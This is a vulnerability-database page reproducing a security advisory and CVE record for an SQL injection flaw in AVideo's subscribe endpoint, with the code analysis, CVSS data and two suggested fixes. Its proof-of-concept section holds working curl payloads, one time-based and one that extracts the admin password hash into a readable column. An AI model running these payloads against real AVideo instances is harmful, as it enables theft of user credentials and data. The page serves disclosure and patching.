Vulnerability-Lookup

GHSA-FFR8-FXHV-FV8H

Vulnerability from github – Published: 2026-03-25 21:56 – Updated: 2026-03-25 21:56

Summary

AVideo is Vulnerable to SQL Injection through Subscribe Endpoint via Unsanitized user_id Parameter

Details

Summary

The Subscribe::save() method in objects/subscribe.php concatenates the $this->users_id property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from $_POST['user_id'] in both subscribe.json.php and subscribeNotify.json.php. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts.

Details

The vulnerability exists because of a disconnect between where intval() is applied and where the value is used in SQL.

Entry points — objects/subscribe.json.php:40 and objects/subscribeNotify.json.php:23:

// subscribe.json.php line 40
$subscribe = new Subscribe(0, $_POST['email'], $_POST['user_id'], User::getId());

Constructor stores raw value — objects/subscribe.php:34:

public function __construct($id, $email = "", $user_id = "", $subscriber_users_id = "")
{
    // ...
    $this->users_id = $user_id;  // Raw $_POST['user_id'], no sanitization
    $this->subscriber_users_id = $subscriber_users_id;
    if (empty($this->id)) {
        $this->loadFromId($this->subscriber_users_id, $user_id, "");
    }
}

getSubscribeFromID sanitizes local copies only — objects/subscribe.php:137-139:

public static function getSubscribeFromID($subscriber_users_id, $user_id, $status = "a"){
    $subscriber_users_id = intval($subscriber_users_id);  // Local variable only
    $user_id = intval($user_id);  // Local variable only — $this->users_id is NOT affected

When getSubscribeFromID finds no matching subscription (the attacker simply targets a user_id they haven't subscribed to), loadFromId() returns false. The object's $this->id remains null, and $this->users_id retains the unsanitized injection payload.

Vulnerable sink — objects/subscribe.php:88:

public function save()
{
    if (!empty($this->id)) {
        // UPDATE path (not reached when $this->id is null)
    } else {
        $this->status = 'a';
        $sql = "INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) 
                VALUES ('{$this->users_id}', ...";  // Direct concatenation of injected value
    }
    $saved = sqlDAL::writeSql($sql);  // Called with NO $formats or $values

sqlDAL::writeSql provides no protection — objects/mysql_dal.php:102:

When called without $formats/$values parameters (as save() does), the eval_mysql_bind() function at line 636 returns true without binding any parameters. The already-concatenated SQL string is passed directly to $global['mysqli']->prepare() and execute(), executing the injection as the prepared statement itself.

PoC

Prerequisites: An authenticated session on the target AVideo instance.

Step 1: Confirm injection with time-based blind SQLi

# Pick a user_id that the current user has NOT subscribed to (e.g., 99999)
# The SLEEP(5) will cause a ~5 second delay confirming injection
curl -s -o /dev/null -w "%{time_total}" \
  -b 'PHPSESSID=VALID_SESSION_ID' \
  -d "user_id=99999'+AND+SLEEP(5)+AND+'1" \
  https://target/objects/subscribe.json.php
# Expected: ~5 second response time (vs <1 second normally)

Step 2: Extract admin password hash via INSERT subquery

# Inject a subquery that reads the admin password hash into the email column
curl -b 'PHPSESSID=VALID_SESSION_ID' \
  -d "user_id=99999',(SELECT+pass+FROM+users+WHERE+isAdmin=1+LIMIT+1),'a','1.1.1.1',now(),now(),'1');%23" \
  https://target/objects/subscribe.json.php

This closes the VALUES clause with attacker-controlled data and comments out the rest of the query. The admin password hash is inserted into the email column of the subscribes table, which can be read back via the subscription list API.

Step 3: Read exfiltrated data

The injected row is readable via any endpoint that queries the subscribes table and returns the email field (e.g., getAllSubscribes()).

The same attack works against objects/subscribeNotify.json.php via the same user_id parameter.

Impact

Full database read access: An attacker with any authenticated account can extract arbitrary data from all database tables using INSERT subqueries, including:
User password hashes (users.pass)
Admin credentials
Encryption salts and API keys from configuration tables
Email addresses and personal data of all users
Data integrity: The attacker can insert arbitrary rows into the subscribes table.
Two affected endpoints: Both subscribe.json.php and subscribeNotify.json.php pass raw $_POST['user_id'] to the vulnerable code path.

Recommended Fix

Apply intval() to $this->users_id before use in the constructor, or better yet, use parameterized queries in save().

Option 1 — Sanitize in constructor (minimal fix):

// objects/subscribe.php, constructor (line 34)
- $this->users_id = $user_id;
+ $this->users_id = intval($user_id);

Option 2 — Use parameterized query in save() (recommended):

// objects/subscribe.php, save() method (lines 87-90)
public function save()
{
    global $global;
    if (!empty($this->id)) {
        $sql = "UPDATE subscribes SET status = ?, notify = ?, ip = ?, modified = now() WHERE id = ?";
        $saved = sqlDAL::writeSql($sql, "sssi", [$this->status, $this->notify, getRealIpAddr(), $this->id]);
    } else {
        $this->status = 'a';
        $sql = "INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) VALUES (?, ?, ?, ?, now(), now(), ?)";
        $saved = sqlDAL::writeSql($sql, "isssi", [intval($this->users_id), $this->email, $this->status, getRealIpAddr(), intval($this->subscriber_users_id)]);
    }

Option 2 is strongly recommended as it also fixes the unsanitized $this->email, $this->status, and getRealIpAddr() values in both the INSERT and UPDATE paths, preventing any future injection through those fields.

Severity

7.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33723"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T21:56:12Z",
    "nvd_published_at": "2026-03-23T19:16:42Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this-\u003eusers_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST[\u0027user_id\u0027]` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts.\n\n## Details\n\nThe vulnerability exists because of a disconnect between where `intval()` is applied and where the value is used in SQL.\n\n**Entry points** \u2014 `objects/subscribe.json.php:40` and `objects/subscribeNotify.json.php:23`:\n\n```php\n// subscribe.json.php line 40\n$subscribe = new Subscribe(0, $_POST[\u0027email\u0027], $_POST[\u0027user_id\u0027], User::getId());\n```\n\n**Constructor stores raw value** \u2014 `objects/subscribe.php:34`:\n\n```php\npublic function __construct($id, $email = \"\", $user_id = \"\", $subscriber_users_id = \"\")\n{\n    // ...\n    $this-\u003eusers_id = $user_id;  // Raw $_POST[\u0027user_id\u0027], no sanitization\n    $this-\u003esubscriber_users_id = $subscriber_users_id;\n    if (empty($this-\u003eid)) {\n        $this-\u003eloadFromId($this-\u003esubscriber_users_id, $user_id, \"\");\n    }\n}\n```\n\n**`getSubscribeFromID` sanitizes local copies only** \u2014 `objects/subscribe.php:137-139`:\n\n```php\npublic static function getSubscribeFromID($subscriber_users_id, $user_id, $status = \"a\"){\n    $subscriber_users_id = intval($subscriber_users_id);  // Local variable only\n    $user_id = intval($user_id);  // Local variable only \u2014 $this-\u003eusers_id is NOT affected\n```\n\nWhen `getSubscribeFromID` finds no matching subscription (the attacker simply targets a user_id they haven\u0027t subscribed to), `loadFromId()` returns false. The object\u0027s `$this-\u003eid` remains null, and `$this-\u003eusers_id` retains the unsanitized injection payload.\n\n**Vulnerable sink** \u2014 `objects/subscribe.php:88`:\n\n```php\npublic function save()\n{\n    if (!empty($this-\u003eid)) {\n        // UPDATE path (not reached when $this-\u003eid is null)\n    } else {\n        $this-\u003estatus = \u0027a\u0027;\n        $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) \n                VALUES (\u0027{$this-\u003eusers_id}\u0027, ...\";  // Direct concatenation of injected value\n    }\n    $saved = sqlDAL::writeSql($sql);  // Called with NO $formats or $values\n```\n\n**`sqlDAL::writeSql` provides no protection** \u2014 `objects/mysql_dal.php:102`:\n\nWhen called without `$formats`/`$values` parameters (as `save()` does), the `eval_mysql_bind()` function at line 636 returns `true` without binding any parameters. The already-concatenated SQL string is passed directly to `$global[\u0027mysqli\u0027]-\u003eprepare()` and `execute()`, executing the injection as the prepared statement itself.\n\n## PoC\n\n**Prerequisites:** An authenticated session on the target AVideo instance.\n\n**Step 1: Confirm injection with time-based blind SQLi**\n\n```bash\n# Pick a user_id that the current user has NOT subscribed to (e.g., 99999)\n# The SLEEP(5) will cause a ~5 second delay confirming injection\ncurl -s -o /dev/null -w \"%{time_total}\" \\\n  -b \u0027PHPSESSID=VALID_SESSION_ID\u0027 \\\n  -d \"user_id=99999\u0027+AND+SLEEP(5)+AND+\u00271\" \\\n  https://target/objects/subscribe.json.php\n# Expected: ~5 second response time (vs \u003c1 second normally)\n```\n\n**Step 2: Extract admin password hash via INSERT subquery**\n\n```bash\n# Inject a subquery that reads the admin password hash into the email column\ncurl -b \u0027PHPSESSID=VALID_SESSION_ID\u0027 \\\n  -d \"user_id=99999\u0027,(SELECT+pass+FROM+users+WHERE+isAdmin=1+LIMIT+1),\u0027a\u0027,\u00271.1.1.1\u0027,now(),now(),\u00271\u0027);%23\" \\\n  https://target/objects/subscribe.json.php\n```\n\nThis closes the `VALUES` clause with attacker-controlled data and comments out the rest of the query. The admin password hash is inserted into the `email` column of the `subscribes` table, which can be read back via the subscription list API.\n\n**Step 3: Read exfiltrated data**\n\nThe injected row is readable via any endpoint that queries the `subscribes` table and returns the `email` field (e.g., `getAllSubscribes()`).\n\nThe same attack works against `objects/subscribeNotify.json.php` via the same `user_id` parameter.\n\n## Impact\n\n- **Full database read access:** An attacker with any authenticated account can extract arbitrary data from all database tables using INSERT subqueries, including:\n  - User password hashes (`users.pass`)\n  - Admin credentials\n  - Encryption salts and API keys from configuration tables\n  - Email addresses and personal data of all users\n- **Data integrity:** The attacker can insert arbitrary rows into the `subscribes` table.\n- **Two affected endpoints:** Both `subscribe.json.php` and `subscribeNotify.json.php` pass raw `$_POST[\u0027user_id\u0027]` to the vulnerable code path.\n\n## Recommended Fix\n\nApply `intval()` to `$this-\u003eusers_id` before use in the constructor, or better yet, use parameterized queries in `save()`.\n\n**Option 1 \u2014 Sanitize in constructor** (minimal fix):\n\n```php\n// objects/subscribe.php, constructor (line 34)\n- $this-\u003eusers_id = $user_id;\n+ $this-\u003eusers_id = intval($user_id);\n```\n\n**Option 2 \u2014 Use parameterized query in save()** (recommended):\n\n```php\n// objects/subscribe.php, save() method (lines 87-90)\npublic function save()\n{\n    global $global;\n    if (!empty($this-\u003eid)) {\n        $sql = \"UPDATE subscribes SET status = ?, notify = ?, ip = ?, modified = now() WHERE id = ?\";\n        $saved = sqlDAL::writeSql($sql, \"sssi\", [$this-\u003estatus, $this-\u003enotify, getRealIpAddr(), $this-\u003eid]);\n    } else {\n        $this-\u003estatus = \u0027a\u0027;\n        $sql = \"INSERT INTO subscribes (users_id, email, status, ip, created, modified, subscriber_users_id) VALUES (?, ?, ?, ?, now(), now(), ?)\";\n        $saved = sqlDAL::writeSql($sql, \"isssi\", [intval($this-\u003eusers_id), $this-\u003eemail, $this-\u003estatus, getRealIpAddr(), intval($this-\u003esubscriber_users_id)]);\n    }\n```\n\nOption 2 is strongly recommended as it also fixes the unsanitized `$this-\u003eemail`, `$this-\u003estatus`, and `getRealIpAddr()` values in both the INSERT and UPDATE paths, preventing any future injection through those fields.",
  "id": "GHSA-ffr8-fxhv-fv8h",
  "modified": "2026-03-25T21:56:12Z",
  "published": "2026-03-25T21:56:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33723"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo is Vulnerable to SQL Injection through Subscribe Endpoint via Unsanitized user_id Parameter"
}

CVE-2026-33723 (GCVE-0-2026-33723)

Vulnerability from cvelistv5 – Published: 2026-03-23 18:50 – Updated: 2026-03-24 15:13

Title

AVideo Vulnerable to SQL Injection in Subscribe Endpoint via Unsanitized user_id Parameter in subscribe.php

Summary

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this->users_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST['user_id']` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch.

Severity

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

SSVC

Exploitation: poc Automatable: no Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
https://github.com/WWBN/AVideo/commit/36dfae22059…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33723",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T14:43:40.671777Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T15:13:32.510Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `Subscribe::save()` method in `objects/subscribe.php` concatenates the `$this-\u003eusers_id` property directly into an INSERT SQL query without sanitization or parameterized binding. This property originates from `$_POST[\u0027user_id\u0027]` in both `subscribe.json.php` and `subscribeNotify.json.php`. An authenticated attacker can inject arbitrary SQL to extract sensitive data from any database table, including password hashes, API keys, and encryption salts. Commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-23T18:50:33.566Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ffr8-fxhv-fv8h"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c"
        }
      ],
      "source": {
        "advisory": "GHSA-ffr8-fxhv-fv8h",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo Vulnerable to SQL Injection in Subscribe Endpoint via Unsanitized user_id Parameter in subscribe.php"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33723",
    "datePublished": "2026-03-23T18:50:33.566Z",
    "dateReserved": "2026-03-23T17:34:57.559Z",
    "dateUpdated": "2026-03-24T15:13:32.510Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-FFR8-FXHV-FV8H

Summary

Details

PoC

Impact

Recommended Fix

CVE-2026-33723 (GCVE-0-2026-33723)

Tags

Sightings

Nomenclature